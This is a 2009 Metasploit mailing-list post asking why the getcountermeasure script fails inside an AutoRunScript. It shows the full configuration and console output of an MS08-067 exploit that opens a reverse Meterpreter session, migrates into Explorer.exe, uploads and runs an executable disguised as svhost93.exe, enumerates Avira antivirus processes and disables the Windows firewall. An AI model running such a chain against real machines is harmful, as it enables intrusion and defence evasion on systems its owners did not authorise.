Metasploit mailing list archives
Problems using getcountermeasure
From: skysbsb at gmail.com (David Gomes)
Date: Mon, 12 Oct 2009 18:18:28 -0300
Hi, I have configured the AutoRunScript like this:

set AutoRunScript multiscript -s /pentest/exploits/framework3/autorun.txt

# cat autorun.txt
migrate Explorer.exe
getcountermeasure -d
uploadexec -e lv.exe

When I ran the exploit command:

msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Portuguese - Brazilian
[*] Selected Target: Windows XP SP2 Portuguese - Brazilian (NX)
[*] Triggering the vulnerability...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 3 opened (x.x.x.102:4444 -> x.x.x.9:1166)
[*] Running Multiscript script.....
[*] Running script List ...
[*] running script migrate Explorer.exe
[*] Migrating to Explorer.exe...
[*] Current server process: svchost.exe (976)
[*] New server process: Explorer.EXE (1904)
[*] running script getcountermeasure -d
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[-] Error: NameError undefined local variable or method `client' for #<#<Class:0xb67a8760>:0xb638c62c>
[-] Error in script: getcountermeasure -d
[*] running script uploadexec -e lv.exe
[*] Running Upload and Execute Meterpreter script....
[*] Uploading lv.exe....
[*] lv.exe uploaded!
[*] Uploaded as C:\DOCUME~1\Usuario\CONFIG~1\Temp\svhost93.exe
[*] running command C:\DOCUME~1\Usuario\CONFIG~1\Temp\svhost93.exe
[*] Finnished!

meterpreter > run getcountermeasure -d
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Possible countermeasure found sched.exe C:\Arquivos de programas\Avira\AntiVir Desktop\sched.exe
[*] Possible countermeasure found avguard.exe C:\Arquivos de programas\Avira\AntiVir Desktop\avguard.exe
[*] Possible countermeasure found avgnt.exe C:\Arquivos de programas\Avira\AntiVir Desktop\avgnt.exe
[*] Getting Windows Built in Firewall configuration...
[*] Disabling Built in Firewall.....
[*] Checking DEP Support Policy...
meterpreter >

As you can see, getcountermeasure fails when run in the autorun script... I have tried putting the command in another place, like after 'uploadexec -e lv.exe' or before 'migrate Explorer.exe', but it still does not work. But when I execute the command after the meterpreter session spawns, it works. Is this right?